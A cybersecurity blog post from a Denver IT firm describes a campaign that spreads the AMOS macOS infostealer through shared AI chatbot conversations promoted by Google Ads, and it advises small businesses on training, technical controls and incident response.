December 21, 2025 7 min read Cybersecurity

AI Chatbots Are Being Weaponized to Spread Malware: What SMBs Need to Know

Cybercriminals have found a new attack vector that bypasses traditional security awareness: weaponized AI chatbot conversations promoted through Google Ads. Here's how the attack works and what your business can do to stay protected.

Breaking Threat Alert

Security researchers have discovered active campaigns using ChatGPT, Grok, and Google search results to distribute the AMOS infostealer malware. This attack is particularly dangerous because it exploits the trust users place in AI assistants and major search engines.

Your employees probably use AI chatbots like ChatGPT every day to get quick answers, write emails, or troubleshoot computer problems. Unfortunately, hackers are now exploiting that trust to install malware on business computers, and this new attack vector is unlike anything we've seen before.

In December 2025, security firms Huntress and Malwarebytes discovered a sophisticated campaign where attackers weaponized AI chatbot conversations to spread the Atomic macOS Stealer (AMOS), an information-stealing malware targeting Mac users. The attack is particularly insidious because it bypasses almost every red flag users are trained to watch for.

How the Attack Works

The genius of this attack is its simplicity. Instead of trying to get past spam filters or trick users into downloading suspicious files, attackers exploit something far more dangerous: the implicit trust people place in Google search results and AI assistants.

The Attack Chain:

  1. Attacker creates a malicious AI conversation - The hacker crafts a ChatGPT or Grok conversation that appears to answer a common question (like "how to clear disk space on Mac") but includes malicious Terminal commands.
  2. Conversation is made public and promoted - The attacker uses the AI platform's sharing features to make the conversation public, then pays to boost it in Google search results or runs Google Ads pointing to it.
  3. Victim searches for innocent help - An employee searches Google for something routine, like "how to free up disk space on macOS," and sees what looks like a legitimate ChatGPT result at the top of the page.
  4. Victim follows "helpful" instructions - The AI conversation presents clear, professional-looking Terminal commands. The user copies and pastes them, unknowingly executing malware.
  5. Malware harvests credentials - AMOS immediately begins stealing passwords, browser data, cryptocurrency wallets, and other sensitive information.

Why This Attack Is So Dangerous for Small Businesses

Traditional security awareness training teaches employees to watch for suspicious emails, strange downloads, and unfamiliar websites. This attack bypasses all of those warnings:

  • No suspicious downloads - The victim isn't downloading an .exe or .dmg file
  • No phishing emails - The attack starts from a trusted Google search
  • Trusted platforms - ChatGPT and Google are tools employees use daily
  • Professional appearance - AI-generated responses look polished and authoritative
  • Targeted queries - Attackers focus on searches IT-savvy users would make
12 Hours
The malicious ChatGPT link was live before being discovered and removed, potentially infecting numerous victims

What Is AMOS and Why Should You Care?

AMOS (Atomic macOS Stealer) is an information-stealing malware specifically designed for Mac computers. Once installed, it can:

  • Harvest all saved passwords from browsers and the macOS Keychain
  • Steal browser session cookies, allowing attackers to hijack logged-in accounts
  • Extract cryptocurrency wallet data from popular wallet applications
  • Capture authentication tokens for cloud services like Microsoft 365 and Google Workspace
  • Establish persistence to survive reboots and continue exfiltrating data

For a small business, a single AMOS infection could expose client data, financial accounts, email archives, and cloud storage, potentially resulting in a serious data breach.

Mac Users Aren't Immune

Many businesses believe Macs don't get malware. This attack specifically targets Mac users who may have a false sense of security. If your company uses Macs, this threat applies directly to you.

The Google Ads Problem

This attack relies heavily on Google Ads to reach victims. Cybercriminals purchase ads that appear at the top of search results, mimicking legitimate content. The ads are designed to look virtually identical to organic search results, requiring users to click a small menu icon to verify the advertiser's identity.

For small businesses, this means:

  • Your employees may click malicious ads thinking they're legitimate search results
  • Ad blockers may not catch all sponsored malicious content
  • Even tech-savvy users can be fooled by professional-looking AI conversations

How to Protect Your Business

1. Update Your Security Awareness Training

Your employees need to know about this new threat vector. Traditional "don't click suspicious links" training isn't enough anymore.

New Training Topics to Add:

  • Never copy-paste Terminal or Command Prompt commands from online sources without understanding them
  • AI chatbot conversations can be manipulated and shouldn't be implicitly trusted
  • Sponsored search results may be malicious, even if they point to legitimate-looking sites
  • When in doubt, ask IT before running any commands on your computer

2. Implement Technical Controls

Security awareness alone isn't sufficient. You need technical safeguards that protect users even when they make mistakes.

  • Endpoint Detection and Response (EDR) - Modern endpoint protection can detect and block AMOS and similar infostealers before they execute
  • DNS filtering - Block known malicious domains at the network level
  • Web content filtering - Restrict access to potentially dangerous content categories
  • Application whitelisting - Prevent unauthorized applications from running
  • Browser security extensions - Deploy extensions that warn about suspicious sites

3. Consider Ad Blocking

Given that malicious Google Ads are a primary attack vector, businesses should evaluate whether ad blocking makes sense for their environment. While this may impact some legitimate services, it eliminates a significant attack surface.

4. Establish an IT Approval Process

Create a simple policy: employees should contact IT before running any Terminal commands, scripts, or "technical fixes" they find online. A quick Slack message or email to your IT team could prevent a major breach.

Is Your Business Protected?

Take our free IT Security Assessment to identify vulnerabilities in your current security posture and get actionable recommendations.

Get Your Free Assessment

What to Do If You Think You're Infected

If an employee may have executed a suspicious command, take these steps immediately:

  1. Disconnect the computer from the network - This limits the malware's ability to exfiltrate data or spread
  2. Don't log into any accounts on the affected device - The malware may be capturing credentials in real-time
  3. Contact your IT provider or security team - They can analyze the device and determine the extent of the compromise
  4. Change passwords from a known-clean device - Prioritize email, banking, and cloud service passwords
  5. Enable MFA everywhere - Even if credentials were stolen, MFA can prevent account takeover
  6. Check for unauthorized access - Review login histories for email, cloud storage, and banking

For confirmed AMOS infections, security experts recommend:

  • Remove suspicious Login Items and LaunchAgents/LaunchDaemons
  • Consider a full macOS reinstall from clean backups
  • Check for rogue browser extensions
  • Verify cryptocurrency wallet integrity if applicable

The Bigger Picture: AI as an Attack Vector

This attack represents a fundamental shift in how cybercriminals operate. As AI tools become ubiquitous in the workplace, they're also becoming tools for attackers. The trust users place in AI responses, combined with the authority these tools appear to have, creates a perfect storm for social engineering.

We expect to see more attacks exploiting AI platforms in 2025 and beyond. Businesses need to adapt their security strategies now, before these techniques become even more sophisticated.

Key Takeaways for Business Owners

Action Items:

  • Brief your team about this new threat immediately
  • Implement a "no command-line commands without IT approval" policy
  • Ensure endpoint protection is deployed on all devices, including Macs
  • Consider DNS filtering and ad blocking at the network level
  • Review and update your incident response procedures
  • Schedule regular security awareness refresher training

Need Help Securing Your Business?

This emerging threat underscores why proactive security management is essential for small businesses. At LocalEdgeIT, we help Denver businesses implement layered security strategies that protect against both traditional and emerging threats.

Our managed security services include endpoint protection, DNS filtering, security awareness training, and 24/7 monitoring, giving you peace of mind that your business is protected even as threats evolve.

Ready to strengthen your security? Take our free IT Security Assessment to identify gaps in your current protection, or contact us to discuss your security needs.

Related Articles

Small Business Cybersecurity Guide 2025

7 critical security measures every Denver small business needs to protect against cyber threats.

Ransomware Protection: What Denver Businesses Need to Know

How to protect your business from the #1 cyber threat facing small businesses.